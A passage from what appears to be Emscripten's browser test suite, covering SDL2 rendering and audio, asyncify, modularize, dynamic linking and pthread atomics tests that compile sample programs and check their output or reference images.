create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify - yield-specific')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# an amount of memory, different from the default, to allocate for the emscripten heap
totalMemory = 33554432
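# 33554432 bytes == 32 MB (2**25)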
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
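# Module.dynamicLibraries lists side modules for the runtime to load before main()
# runs, so side() should already be resolvable when main.cpp calls it.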
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet?) to retrieve stdout from the browser in tests,
# so do the assert about the expected output inside the browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed the string without a trailing \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
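# prep_no_SAB: nulling out SharedArrayBuffer and Atomics in the shell simulates a browser
# without threading support, so pthread-enabled builds can be checked for a graceful fallback.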
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
          if self.is_wasm_backend() and ('--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args):
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # Tests the remaining GCC atomics after the two tests above.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
